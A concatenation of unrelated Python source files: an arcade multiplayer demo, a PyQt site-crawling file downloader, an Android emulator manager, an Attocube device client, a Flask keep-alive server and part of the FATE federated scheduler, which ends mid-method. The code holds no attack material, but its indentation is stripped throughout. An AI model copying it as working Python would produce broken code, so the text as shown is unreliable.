self.position = Vec2d(x, y)
self.color = color
self.filled = filled
def draw(self):
if self.filled:
arcade.draw_rectangle_filled(self.position.x, self.position.y, 50, 50, self.color)
else:
arcade.draw_rectangle_outline(self.position.x, self.position.y, 50, 50, self.color, border_width=4)
class MyGame(arcade.Window):
def __init__(self, width, height):
super().__init__(width, height, title="Multiplayer Demo")
arcade.set_background_color(arcade.color.GRAY)
self.game_state = GameState(player_states=[PlayerState()])
self.player = Rectangle(0, 0, arcade.color.GREEN_YELLOW, filled=False)
self.player_input = PlayerEvent()
def update(self, dt):
pass
def on_draw(self):
arcade.start_render()
self.player.draw()
def on_key_press(self, key, modifiers):
self.player_input.keys[key] = True
def on_key_release(self, key, modifiers):
self.player_input.keys[key] = False
async def iomain(window: MyGame, loop):
ctx = Context()
sub_sock: Socket = ctx.socket(zmq.SUB)
sub_sock.connect('tcp://localhost:25000')
sub_sock.subscribe('') # Required for PUB+SUB
push_sock: Socket = ctx.socket(zmq.PUSH)
push_sock.connect('tcp://localhost:25001')
async def send_player_input():
""" Task A """
while True:
d = asdict(window.player_input)
msg = dict(event=d)
await push_sock.send_json(msg)
await asyncio.sleep(1 / UPDATE_TICK)
async def receive_game_state():
""" Task B """
while True:
gs_string = await sub_sock.recv_string()
window.game_state.from_json(gs_string)
ps = window.game_state.player_states[0]
window.player.position = Vec2d(ps.x, ps.y)
try:
await asyncio.gather(send_player_input(), receive_game_state())
finally:
sub_sock.close(1)
push_sock.close(1)
ctx.destroy(linger=1)
def thread_worker(window: MyGame):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.create_task(iomain(window, loop))
loop.run_forever()
def main():
window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT)
thread = threading.Thread(
target=thread_worker, args=(window,), daemon=True)
thread.start()
arcade.run()
if __name__ == "__main__":
main()
|
main.py
|
from gui.uis.windows.main_window.functions_main_window import *
import sys,os,time
import requests,json
import random
from bs4 import BeautifulSoup as bs4
from qt_core import *
from gui.core.json_settings import Settings
from gui.uis.windows.main_window import *
# IMPORT PY ONE DARK WIDGETS
from gui.widgets import *
import threading,queue
from urllib import request,parse
# ADJUST QT FONT DPI FOR HIGHT SCALE AN 4K MONITOR
os.environ["QT_FONT_DPI"] = "96"
#IF IS 4K MONITOR ENABLE
#os.environ["QT_SCALE_FACTOR"] = "2"
# MAIN WINDOW
class MainWindow(QMainWindow):
def selectDirectory(self):
selected_directory = QFileDialog.getExistingDirectory()
self.line_edit3.setText(selected_directory)
def openDirectory(self):
basepath=self.line_edit3.text()
os.startfile(basepath)
def __init__(self):
super().__init__()
# SETUP MAIN WINDOw
# Load widgets from "gui\uis\main_window\ui_main.py"
self.ui = UI_MainWindow()
self.ui.setup_ui(self)
# LOAD SETTINGS
settings = Settings()
self.settings = settings.items
# SETUP MAIN WINDOW
self.hide_grips = True # Show/Hide resize grips
SetupMainWindow.setup_gui(self)
# SHOW MAIN WINDOW
self.show()
# LEFT MENU BTN IS CLICKED
# Run function when btn is clicked
# Check funtion by object name / btn_id
def msg(self,title,content):
#信息框
QMessageBox.critical(self,title,content,QMessageBox.Ok,QMessageBox.Ok)
def downfile(self,req):
pass
def download(self,data, headers={}, interval=0.5):
basepath=self.line_edit3.text().replace('\\','/')
def MB(byte):
return round(byte / 1024 / 1024, 2)
row=data[0]
cir1=data[1]
name=data[2]
url=data[3]
path=data[4]
fullpath=basepath+path
if not fullpath.endswith('/'):
fullpath=fullpath+'/'
try:
os.makedirs(fullpath)
except:
pass
self.table_widget.setItem(row,3,QTableWidgetItem('Downloading'))
self.ui.credits.copyright_label.setText('下载:'+name)
header={'Proxy-Connection': 'keep-alive'}
res = requests.get(url, stream=True, headers=header)
file_size = int(res.headers['content-length']) # 文件大小 Byte
f = open(fullpath+name, 'wb')
down_size = 0 # 已下载字节数
old_down_size = 0 # 上一次已下载字节数
time_ = time.time()
self.circular_progress_1.set_value(cir1)
for chunk in res.iter_content(chunk_size=512):
if chunk:
f.write(chunk)
down_size += len(chunk)
if time.time() - time_ > interval:
# rate = down_size / file_size * 100 # 进度 0.01%
speed = (down_size - old_down_size) / interval # 速率 0.01B/s
old_down_size = down_size
time_ = time.time()
print_params = [MB(speed), MB(down_size), MB(file_size), (file_size - down_size) / speed]
cir2=int(down_size/file_size*100)
self.circular_progress_2.set_value(cir2)
cir3=MB(speed)
self.circular_progress_3.set_value(cir3)
self.ui.credits.copyright_label.setText('开始下载'+name)
#print('\r{:.1f}MB/s - {:.1f}MB,共 {:.1f}MB,还剩 {:.0f} 秒 '.format(*print_params), end='')
f.close()
self.circular_progress_2.set_value(100)
self.table_widget.setItem(row,3,QTableWidgetItem('Complete'))
self.ui.credits.copyright_label.setText('完成')
def dumpThread(self,baseurl,hosturl):
page_urls=[baseurl]
_fileext=self.line_edit2.text()
if _fileext=='':
limfile=False
else:
limfile=True
fileext=_fileext.split('.')
fileext.remove('')
for now_url in page_urls:
self.ui.credits.copyright_label.setText('正在解析:'+now_url)
response = requests.get(now_url)
soup = bs4(response.text, "html.parser")
a_tags = soup.find_all('a')
for tag in a_tags:
#self.circular_progress_1.set_value(random.randint(1,90))
#self.circular_progress_2.set_value(random.randint(1,90))
#self.circular_progress_3.set_value(random.randint(1,90))
href=tag.get('href','')
title=tag.get('title')
if href=='/' or href=='' or href.startswith('https://') or href.startswith('http://'):
continue
if href.startswith('/'):
fullurl=hosturl+href
else:
fullurl=baseurl+href
if fullurl in page_urls or fullurl==hosturl:
continue
_req=request.urlopen(fullurl)
if 'text/html' in _req.info().get('Content-Type'):
page_urls.append(fullurl)
else:
need=True
if limfile:
need=False
for x in fileext:
if href.endswith(x):
need=True
if need!=True:
continue
row_number = self.table_widget.rowCount()
self.table_widget.insertRow(row_number) # Insert row
self.table_widget.setItem(row_number, 0, QTableWidgetItem(title)) # Add name
self.table_widget.setItem(row_number, 1, QTableWidgetItem(fullurl)) # Add nick
_path=parse.urlparse(fullurl).path
_path=_path.split('/')
_path='/'.join(_path[0:-1])
self.table_widget.setItem(row_number, 2, QTableWidgetItem(parse.unquote(_path))) # Add nick
self.table_widget.setItem(row_number, 3, QTableWidgetItem('Padding')) # Add nick
self.table_widget.setCurrentCell(row_number,0)
self.ui.credits.copyright_label.setText('抓取完成,开始下载')
row_number = self.table_widget.rowCount()
col_number = self.table_widget.columnCount()
for x in range(row_number):
cir1=int(x/row_number*100)
parms=[x,cir1]
for y in range(col_number):
parms.append(self.table_widget.item(x,y).text())
self.table_widget.setCurrentCell(x,0)
self.download(parms)
self.circular_progress_1.set_value(100)
def start_download(self):
url=self.line_edit.text()
url_parse=parse.urlparse(url)
if url_parse.netloc and url_parse.scheme:
hosturl="://".join([url_parse.scheme,url_parse.netloc])
baseurl=hosturl+url_parse.path
if not baseurl.endswith('/'):
baseurl=baseurl+'/'
t1 = threading.Thread(target=self.dumpThread,args=[baseurl,hosturl])
t1.start()
else:
self.msg('URL错误','请输入正确的URL并重试')
def clear(self):
self.table_widget.clearContents()
row_number = self.table_widget.rowCount()
for x in range(row_number):
self.table_widget.removeRow(0)
def btn_clicked(self):
# GET BT CLICKED
btn = SetupMainWindow.setup_btns(self)
# Remove Selection If Clicked By "btn_close_left_column"
if btn.objectName() != "btn_settings":
self.ui.left_menu.deselect_all_tab()
# Get Title Bar Btn And Reset Active
top_settings = MainFunctions.get_title_bar_btn(self, "btn_top_settings")
top_settings.set_active(False)
# LEFT MENU
# ///////////////////////////////////////////////////////////////
# HOME BTN
if btn.objectName() == "btn_home":
# Select Menu
self.ui.left_menu.select_only_one(btn.objectName())
# Load Page 1
MainFunctions.set_page(self, self.ui.load_pages.page_1)
# WIDGETS BTN
if btn.objectName() == "btn_widgets":
# Select Menu
self.ui.left_menu.select_only_one(btn.objectName())
# Load Page 2
MainFunctions.set_page(self, self.ui.load_pages.page_2)
# LOAD USER PAGE
if btn.objectName() == "btn_add_user":
# Select Menu
self.ui.left_menu.select_only_one(btn.objectName())
# Load Page 3
MainFunctions.set_page(self, self.ui.load_pages.page_3)
# BOTTOM INFORMATION
if btn.objectName() == "btn_info":
# CHECK IF LEFT COLUMN IS VISIBLE
if not MainFunctions.left_column_is_visible(self):
self.ui.left_menu.select_only_one_tab(btn.objectName())
# Show / Hide
MainFunctions.toggle_left_column(self)
self.ui.left_menu.select_only_one_tab(btn.objectName())
else:
if btn.objectName() == "btn_close_left_column":
self.ui.left_menu.deselect_all_tab()
# Show / Hide
MainFunctions.toggle_left_column(self)
self.ui.left_menu.select_only_one_tab(btn.objectName())
# Change Left Column Menu
if btn.objectName() != "btn_close_left_column":
MainFunctions.set_left_column_menu(
self,
menu = self.ui.left_column.menus.menu_2,
title = "Info tab",
icon_path = Functions.set_svg_icon("icon_info.svg")
)
# SETTINGS LEFT
if btn.objectName() == "btn_settings" or btn.objectName() == "btn_close_left_column":
# CHECK IF LEFT COLUMN IS VISIBLE
if not MainFunctions.left_column_is_visible(self):
# Show / Hide
MainFunctions.toggle_left_column(self)
self.ui.left_menu.select_only_one_tab(btn.objectName())
else:
if btn.objectName() == "btn_close_left_column":
self.ui.left_menu.deselect_all_tab()
# Show / Hide
MainFunctions.toggle_left_column(self)
self.ui.left_menu.select_only_one_tab(btn.objectName())
# Change Left Column Menu
if btn.objectName() != "btn_close_left_column":
MainFunctions.set_left_column_menu(
self,
menu = self.ui.left_column.menus.menu_1,
title = "Settings Left Column",
icon_path = Functions.set_svg_icon("icon_settings.svg")
)
# SETTINGS TITLE BAR
if btn.objectName() == "btn_top_settings":
# Toogle Active
if not MainFunctions.right_column_is_visible(self):
btn.set_active(True)
# Show / Hide
MainFunctions.toggle_right_column(self)
else:
btn.set_active(False)
# Show / Hide
MainFunctions.toggle_right_column(self)
# Get Left Menu Btn
top_settings = MainFunctions.get_left_menu_btn(self, "btn_settings")
top_settings.set_active_tab(False)
# DEBUG
print(f"Button {btn.objectName()}, clicked!")
# LEFT MENU BTN IS RELEASED
# Run function when btn is released
# Check funtion by object name / btn_id
def btn_released(self):
# GET BT CLICKED
btn = SetupMainWindow.setup_btns(self)
# DEBUG
print(f"Button {btn.objectName()}, released!")
# RESIZE EVENT
def resizeEvent(self, event):
SetupMainWindow.resize_grips(self)
# MOUSE CLICK EVENTS
def mousePressEvent(self, event):
# SET DRAG POS WINDOW
self.dragPos = event.globalPos()
# SETTINGS WHEN TO START
if __name__ == "__main__":
# APPLICATION
app = QApplication(sys.argv)
app.setWindowIcon(QIcon("icon.ico"))
window = MainWindow()
# EXEC APP
sys.exit(app.exec())
|
emulators.py
|
import sys
import time
from contextlib import suppress
import asyncio
import logging
import os
import subprocess
from dataclasses import dataclass
from multiprocessing import Queue, Process
from pathlib import Path
from typing import Optional, List, Dict, Any, Set, Union, Coroutine, Tuple, Mapping
from mobiletestorchestrator.device import Device
__all__ = ["EmulatorBundleConfiguration", "Emulator"]
log = logging.getLogger(str(Path(__file__).stem))
@dataclass
class EmulatorBundleConfiguration:
"""Path to SDK (must contain platform-tools and emulator dirs)"""
sdk: Path
"""Location of AVDs, or None for default"""
avd_dir: Optional[Path] = None
"""Location of system image or None for default"""
system_img: Optional[Path] = None
"""Location of kernal to use or None for default"""
kernel: Optional[Path] = None
"""location of RAM disk or None for default"""
ramdisk: Optional[Path] = None
"""which working directory to this before startup (or None to use cwd)"""
working_dir: Optional[Path] = None
"""timeout if boot does not happen after this many seconds"""
boot_timeout: int = 5*60
def adb_path(self) -> Path:
if sys.platform == 'win32':
return self.sdk.joinpath("platform-tools").joinpath("adb.exe")
else:
return self.sdk.joinpath("platform-tools").joinpath("adb")
def launch_cmd(self, avd: str, port: int, args: Optional[List[str]] = None) -> List[str]:
if sys.platform == 'win32':
emulator_cmd = self.sdk.joinpath("emulator").joinpath("emulator.exe")
else:
emulator_cmd = self.sdk.joinpath("emulator").joinpath("emulator")
if not emulator_cmd.is_file():
raise Exception(f"Could not find emulator cmd to launch emulator @ {emulator_cmd}")
if not self.adb_path().is_file():
raise Exception(f"Could not find adb cmd @ {self.adb_path()}")
cmd = [str(emulator_cmd), "-avd", avd, "-port", str(port), "-read-only"]
if self.system_img:
cmd += ["-system", str(self.system_img)]
if self.kernel:
cmd += ["-kernel", str(self.kernel)]
if self.ramdisk:
cmd += ["-ramdisk", str(self.ramdisk)]
if args:
cmd += args
return cmd
class Emulator(Device):
PORTS = list(range(5554, 5585, 2))
_launches: Dict[str, Tuple[str, int, EmulatorBundleConfiguration, List[str], Mapping[str, str]]] = {}
class FailedBootError(Exception):
def __init__(self, port: int, stdout: str):
super().__init__(f"Failed to start emulator on port {port}:\n{stdout}")
self._port = port
@property
def port(self) -> int:
return self._port
def is_alive(self) -> bool:
return self.get_state(False) == Device.State.ONLINE
async def restart(self) -> None:
"""
Restart this emulator and make it available for use again
"""
if self._device_id not in Emulator._launches:
raise ValueError(f"Given device {self._device_id} was launched externally; "
"only emulators launched through 'Emulator.launch' can be relaunched ")
avd, port, config, args, env = Emulator._launches[self._device_id]
async def wait_for_boot() -> None:
subprocess.Popen(config.launch_cmd(port=port, avd=avd, args=args),
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
env=env)
booted = False
while await self.get_state(False) != Device.State.ONLINE:
await asyncio.sleep(1)
while not booted:
booted = self.get_system_property("sys.boot_completed") == "1"
await asyncio.sleep(1)
await asyncio.wait_for(wait_for_boot(), config.boot_timeout)
@classmethod
async def launch(cls, port: int, avd: str, config: EmulatorBundleConfiguration, *args: str) -> "Emulator":
"""
Launch an emulator on the given port, with named avd and configuration
:param port: which port to launch on
:param avd: name of emulator AVD
:param config: configuration of emulator
:param args: add'l arguments to pass to emulator command
"""
if port not in cls.PORTS:
raise ValueError(f"Port must be one of {cls.PORTS}")
device_id = f"emulator-{port}"
device = Device(device_id)
with suppress(Exception):
device.execute_remote_cmd("emu", "kill") # attempt to kill any existing emulator at this port
await asyncio.sleep(2)
if sys.platform == 'win32':
emulator_cmd = config.sdk.joinpath("emulator").joinpath("emulator.exe")
else:
emulator_cmd = config.sdk.joinpath("emulator").joinpath("emulator")
if not emulator_cmd.is_file():
raise Exception(f"Could not find emulator cmd to launch emulator @ {emulator_cmd}")
if not config.adb_path().is_file():
raise Exception(f"Could not find adb cmd @ {config.adb_path()}")
cmd = config.launch_cmd(avd=avd, port=port, args=list(args))
environ = dict(os.environ)
environ["ANDROID_AVD_HOME"] = str(config.avd_dir)
environ["ANDROID_SDK_HOME"] = str(config.sdk)
if sys.platform.lower() == 'win32':
environ["USERNAME"] = os.getlogin()
environ["USERPROFILE"] = f"C:\\Users\\{environ['USERNAME']}"
booted = False
proc = subprocess.Popen(
cmd,
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
env=environ
)
try:
async def wait_for_boot() -> None:
nonlocal booted
nonlocal proc
nonlocal device_id
if proc.poll() is not None:
raise Exception(proc.stdout.read())
while await device.get_state_async(False) != Device.State.ONLINE:
if proc.poll() is not None:
raise Exception(proc.stdout.read())
await asyncio.sleep(1)
if proc.poll() is not None:
stdout, _ = proc.communicate()
raise Emulator.FailedBootError(port, stdout.decode('utf-8'))
start = time.time()
while not booted:
booted = device.get_system_property("sys.boot_completed", ) == "1"
await asyncio.sleep(1)
duration = time.time() - start
log.debug(f">>> {device.device_id} [{duration}] Booted?: {booted}")
await asyncio.wait_for(wait_for_boot(), config.boot_timeout)
Emulator._launches[device_id] = (avd, port, config, list(args), environ)
return Emulator(device_id)
except Exception as e:
raise Emulator.FailedBootError(port, str(e)) from e
finally:
if not booted:
with suppress(Exception):
proc.kill()
def kill(self) -> None:
"""
Kill this emulator (underlying Process)
"""
log.debug(f">>>>> Killing emulator {self.device_id}")
self.execute_remote_cmd("emu", "kill")
class EmulatorQueue:
def __init__(self, count: int):
"""
:param count: how many emulators to launch and put in the queue
"""
if count > len(Emulator.PORTS):
raise Exception(f"Can have at most {count} emulators at one time")
self._count = count
self._q: Queue["Emulator"] = Queue(count)
self._restart_q: Queue[Optional["Emulator"]] = Queue()
self._process: Optional[Process] = None
async def start_async(self, avd: str, config: EmulatorBundleConfiguration, *args: str) -> None:
"""
Aynchronous start of an emulator
:param avd: name of avd to launch
:param config: emulator bundle config
:param args: additional arguments to pass to the emulator launch command
"""
emulators = []
async def launch_next(index: int, *args: Any, **kargs: Any) -> Emulator:
await asyncio.sleep(index*3) # space out launches as this can help with avoiding instability
return await Emulator.launch(*args, **kargs)
async def launch(count: int) -> int:
emulator_launches: Union[Set[asyncio.Future[Emulator]],
Set[Coroutine[Any, Any, Any]]] = set(
launch_next(index, port, avd, config, *args) for index, port in enumerate(Emulator.PORTS[:count]))
failed_count = 0
pending = emulator_launches
while pending:
completed, pending = await asyncio.wait(pending, return_when=asyncio.FIRST_COMPLETED)
for emulator_task in completed:
emulator = emulator_task.result()
if isinstance(emulator, Emulator):
self._q.put(emulator)
emulators.append(emulator)
elif isinstance(emulator, Emulator.FailedBootError):
failed_count += 1
exc = emulator
raise exc
return failed_count
failed = await launch(self._count)
if failed != 0 and emulators:
# retry the failed count of emulators
failed = await launch(failed)
if failed != 0:
for em in emulators:
em.kill()
raise Exception("Failed to boot all emulators")
while True:
emulator: Optional[Emulator] = self._restart_q.get()
if emulator is not None:
await emulator.restart()
else:
break # None signal end
for emulator in emulators:
emulator.kill()
self._q.close()
self._restart_q.close()
log.debug(">>>> Exiting emulator queue task")
def __enter__(self) -> "EmulatorQueue":
return self
def __exit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
with suppress(Exception):
self.stop()
def stop(self) -> None:
"""
Stop the background process monitoring emulators and stop each emulator
"""
if self._process:
self._restart_q.put(None) # signals end
self._process.join(timeout=10)
with suppress(Exception):
self._q.close()
self._restart_q.close()
def relinquish(self, emulator: Emulator) -> None:
"""
Relinquish emulator back to the queue
:param emulator: emulator to relinquish
"""
self._q.put(emulator)
def reserve(self, timeout: Optional[float] = None) -> Emulator:
"""
reserve an emulator, blocking until the next one is available if necessary
:param timeout: maximum time to wait, in seconds
:return: the requested emulator
"""
emulator: Emulator = self._q.get(timeout=timeout)
while not emulator.is_alive():
self._restart_q.put(emulator)
self._q.get(timeout=timeout)
return emulator
@classmethod
def start(cls, count: int, avd: str, config: EmulatorBundleConfiguration, *args: str) -> "EmulatorQueue":
"""
Start the given number of emulators with the given avd and bundle configuration.
Launches emulators in the background and returns quickly. The retrieve command will
block on a Queue until the first emulator is booted and available from the background
process launching the emulators.
:param count: number of emulators to start
:param avd: name of avd to start
:param config: emulator configuration bundle
:param args: Additional arguments that will be passed when launching each emulator
:return: the queue for retrieving/relinquishing emulators
"""
def entry_point(avd: str, config: EmulatorBundleConfiguration, queue: EmulatorQueue) -> None:
asyncio.get_event_loop().run_until_complete(queue.start_async(avd, config, *args))
queue = EmulatorQueue(count)
queue._process = Process(target=entry_point, args=(avd, config, queue))
queue._process.start()
return queue
|
ACS.py
|
# -*- coding: utf-8 -*-
import sys
import socket
import json
from time import time, sleep
from random import randint
from threading import Thread, Lock
try:
import netifaces
except:
pass
import urllib.request
import xml.dom.minidom as minidom
class AttoException(Exception):
def __init__(self, errorText = None, errorNumber = 0):
self.errorText = errorText
self.errorNumber = errorNumber
class Device(object):
TCP_PORT = 9090
is_open = False
request_id = randint(0, 1000000)
request_id_lock = Lock()
response_buffer = {}
def __init__(self, address):
self.address = address
self.language = 0
self.apiversion = 2
self.response_lock = Lock()
def __del__(self):
self.close()
def connect(self):
"""
Initializes and connects the selected AMC device.
"""
if not self.is_open:
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.settimeout(10)
tcp.connect((self.address, self.TCP_PORT))
self.tcp = tcp
if sys.version_info[0] > 2:
self.bufferedSocket = tcp.makefile("rw", newline='\r\n')
else:
self.bufferedSocket = tcp.makefile("rw")
self.is_open = True
def close(self):
"""
Closes the connection to the device.
Returns
-------
"""
if self.is_open:
self.bufferedSocket.close()
self.tcp.close()
self.is_open = False
def sendRequest(self, method, params=False):
req = {
"jsonrpc": "2.0",
"method": method,
"api": self.apiversion
}
if params:
req["params"] = params
with Device.request_id_lock:
req["id"] = Device.request_id
self.bufferedSocket.write(json.dumps(req))
self.bufferedSocket.flush()
Device.request_id = Device.request_id + 1
return req["id"]
def getResponse(self, request_id):
start_time = time()
while True:
if request_id in self.response_buffer:
response = self.response_buffer[request_id]
del self.response_buffer[request_id]
return response
if time() - start_time > 10:
raise TimeoutError("No result")
# Only one thread is allowed to read buffer
# Otherwise, deadlock is possible
if self.response_lock.acquire(blocking=False):
try:
response = self.bufferedSocket.readline()
parsed = json.loads(response)
if parsed["id"] == request_id:
return parsed
else:
self.response_buffer[parsed["id"]] = parsed
finally:
self.response_lock.release()
else:
# Sleep to unblock scheduler
sleep(0.01)
def request(self,method,params=False):
""" Synchronous request.
"""
if not self.is_open:
raise AttoException("not connected, use connect()");
request_id = self.sendRequest(method, params)
return self.getResponse(request_id)
def printError(self, errorNumber):
""" Converts the errorNumber into an error string an prints it to the
console.
Parameters
----------
errorNumber : int
"""
print("Error! " + str(self.system_service.errorNumberToString(self.language, errorNumber)[1]))
def handleError(self, response, ignoreFunctionError=False):
if response.get('error', False):
raise AttoException("JSON error in %s" % response['error'])
errNo = response['result'][0]
if (errNo != 0 and errNo != 'null' and not ignoreFunctionError):
raise AttoException(("Error! " + str(self.system_service.errorNumberToString(self.language ,errNo))), errNo)
return errNo
@staticmethod
def discover(cls):
try:
network_ifaces = netifaces.interfaces()
except NameError:
print("Install netifaces for discovery")
print("Python:")
print("pip install netifaces")
print("\nPython3:")
print("pip3 install netifaces")
return {}
msg = \
'M-SEARCH * HTTP/1.1\r\n' \
'HOST:239.255.255.250:1900\r\n' \
'ST:urn:schemas-attocube-com:device:' + str(cls) + ':1\r\n' \
'MX:2\r\n' \
'MAN:"ssdp:discover"\r\n' \
'\r\n'
def send_and_recv(iface, devices, devices_lock):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.bind((iface, 0))
s.settimeout(2)
s.sendto(str.encode(msg), ('239.255.255.250', 1900))
try:
while True:
_, addr = s.recvfrom(65507)
with devices_lock:
devices.append(addr[0])
except socket.timeout:
pass
thread_pool = []
devices = []
devices_lock = Lock()
for iface in network_ifaces:
addr = netifaces.ifaddresses(iface)
if netifaces.AF_INET not in addr:
continue
for ip in addr[netifaces.AF_INET]:
if "addr" not in ip:
continue
thread_pool.append(Thread(target=send_and_recv, args=(ip["addr"], devices, devices_lock)))
thread_pool[-1].start()
for thread in thread_pool:
thread.join()
def getElementData(xmlNode, tag):
tagNodes = xmlNode.getElementsByTagName(tag)
if len(tagNodes) == 0:
return None
childNodes = tagNodes[0].childNodes
if len(childNodes) == 0:
return None
return childNodes[0].data
deviceInfos = {}
for ip in devices:
try:
location = "http://" + ip + ":49000/upnp.xml"
response = urllib.request.urlopen(location)
response = response.read()
xmlNode = minidom.parseString(response)
serialNumber = getElementData(xmlNode, 'serialNumber')
ipAddress = getElementData(xmlNode, 'ipAddress')
macAddress = getElementData(xmlNode, 'macAddress')
friendlyName = getElementData(xmlNode, 'friendlyName')
modelName = getElementData(xmlNode, 'modelName')
lockedStatus = getElementData(xmlNode, 'lockedStatus')
deviceInfos[ip] = (
serialNumber,
ipAddress,
macAddress,
friendlyName,
modelName,
lockedStatus
)
except:
pass
return deviceInfos
|
keepalive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Script running successfully"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
federated_scheduler.py
|
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from fate_arch.common import base_utils
from fate_flow.utils.api_utils import federated_api
from fate_flow.utils.log_utils import start_log, failed_log, successful_log
from fate_flow.utils.log_utils import schedule_logger
from fate_flow.entity import RetCode
from fate_flow.entity.run_status import FederatedSchedulingStatusCode
from fate_flow.entity.types import ResourceOperation
from fate_flow.db.db_models import Job, Task
from fate_flow.operation.job_saver import JobSaver
import threading
class FederatedScheduler(object):
"""
Send commands to party,
Report info to initiator
"""
# Task
REPORT_TO_INITIATOR_FIELDS = ["party_status", "start_time", "update_time", "end_time", "elapsed"]
# Job
@classmethod
def create_job(cls, job: Job):
return cls.job_command(job=job, command="create", command_body=job.to_human_model_dict(), parallel=False)
@classmethod
def update_parameter(cls, job: Job, updated_parameters):
return cls.job_command(job=job, command="parameter/update", command_body=updated_parameters, parallel=False)
@classmethod
def resource_for_job(cls, job, operation_type: ResourceOperation, specific_dest=None):
schedule_logger(job.f_job_id).info(f"try to {operation_type} job resource")
status_code, response = cls.job_command(job=job, command=f"resource/{operation_type.value}", specific_dest=specific_dest)
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info(f"{operation_type} job resource successfully")
else:
schedule_logger(job.f_job_id).info(f"{operation_type} job resource failed")
return status_code, response
@classmethod
def dependence_for_job(cls, job, specific_dest=None):
schedule_logger(job.f_job_id).info(f"try to check job dependence")
status_code, response = cls.job_command(job=job, command=f"dependence/check", specific_dest=specific_dest)
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info(f"check job dependence successfully")
else:
schedule_logger(job.f_job_id).info(f"check job dependence failed")
return status_code, response
@classmethod
def start_job(cls, job, command_body=None):
return cls.job_command(job=job, command="start", command_body=command_body)
@classmethod
def align_args(cls, job, command_body):
return cls.job_command(job=job, command="align", command_body=command_body)
@classmethod
def sync_job(cls, job, update_fields):
sync_info = job.to_human_model_dict(only_primary_with=update_fields)
schedule_logger(job.f_job_id).info("sync job info to all party")
status_code, response = cls.job_command(job=job, command="update", command_body=sync_info)
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info("sync job info to all party successfully")
else:
schedule_logger(job.f_job_id).info(f"sync job info to all party failed: \n{response}")
return status_code, response
@classmethod
def sync_job_status(cls, job):
schedule_logger(job.f_job_id).info(f"job is {job.f_status}, sync to all party")
status_code, response = cls.job_command(job=job, command=f"status/{job.f_status}", command_body=job.to_human_model_dict())
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info(f"sync job status {job.f_status} to all party success")
else:
schedule_logger(job.f_job_id).info(f"sync job status {job.f_status} to all party failed: \n{response}")
return status_code, response
@classmethod
def save_pipelined_model(cls, job):
schedule_logger(job.f_job_id).info("try to save job pipelined model")
status_code, response = cls.job_command(job=job, command="model")
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info("save job pipelined model success")
else:
schedule_logger(job.f_job_id).info(f"save job pipelined model failed:\n{response}")
return status_code, response
@classmethod
def stop_job(cls, job, stop_status):
schedule_logger(job.f_job_id).info("try to stop job")
job.f_status = stop_status
status_code, response = cls.job_command(job=job, command="stop/{}".format(stop_status))
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info("stop job success")
else:
schedule_logger(job.f_job_id).info(f"stop job failed:\n{response}")
return status_code, response
@classmethod
def request_stop_job(cls, job, stop_status, command_body=None):
return cls.job_command(job=job, command="stop/{}".format(stop_status), dest_only_initiator=True, command_body=command_body)
@classmethod
def request_rerun_job(cls, job, command_body):
return cls.job_command(job=job, command="rerun", command_body=command_body, dest_only_initiator=True)
@classmethod
def clean_job(cls, job):
schedule_logger(job.f_job_id).info("try to clean job")
status_code, response = cls.job_command(job=job, command="clean", command_body=job.f_runtime_conf_on_party["role"].copy())
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(job.f_job_id).info("clean job success")
else:
schedule_logger(job.f_job_id).info(f"clean job failed:\n{response}")
return status_code, response
@classmethod
def job_command(cls, job, command, command_body=None, dest_only_initiator=False, specific_dest=None, parallel=False):
federated_response = {}
job_parameters = job.f_runtime_conf_on_party["job_parameters"]
if dest_only_initiator:
dest_partis = [(job.f_initiator_role, [job.f_initiator_party_id])]
api_type = "initiator"
elif specific_dest:
dest_partis = specific_dest.items()
api_type = "party"
else:
dest_partis = job.f_roles.items()
api_type = "party"
threads = []
for dest_role, dest_party_ids in dest_partis:
federated_response[dest_role] = {}
for dest_party_id in dest_party_ids:
endpoint = f"/{api_type}/{job.f_job_id}/{dest_role}/{dest_party_id}/{command}"
args = (job.f_job_id, job.f_role, job.f_party_id, dest_role, dest_party_id, endpoint, command_body, job_parameters["federated_mode"], federated_response)
if parallel:
t = threading.Thread(target=cls.federated_command, args=args)
threads.append(t)
t.start()
else:
cls.federated_command(*args)
for thread in threads:
thread.join()
return cls.return_federated_response(federated_response=federated_response)
@classmethod
def create_task(cls, job, task):
return cls.task_command(job=job, task=task, command="create", command_body=task.to_human_model_dict())
@classmethod
def start_task(cls, job, task):
return cls.task_command(job=job, task=task, command="start", command_body={}, need_user=True)
@classmethod
def collect_task(cls, job, task):
return cls.task_command(job=job, task=task, command="collect")
@classmethod
def sync_task(cls, job, task, update_fields):
sync_info = task.to_human_model_dict(only_primary_with=update_fields)
schedule_logger(task.f_job_id).info("sync task {} {} info to all party".format(task.f_task_id, task.f_task_version))
status_code, response = cls.task_command(job=job, task=task, command="update", command_body=sync_info)
if status_code == FederatedSchedulingStatusCode.SUCCESS:
schedule_logger(task.f_job_id).info("sync task {} {} info to all party successfully".format(task.f_task_id, task.f_task_version))
else:
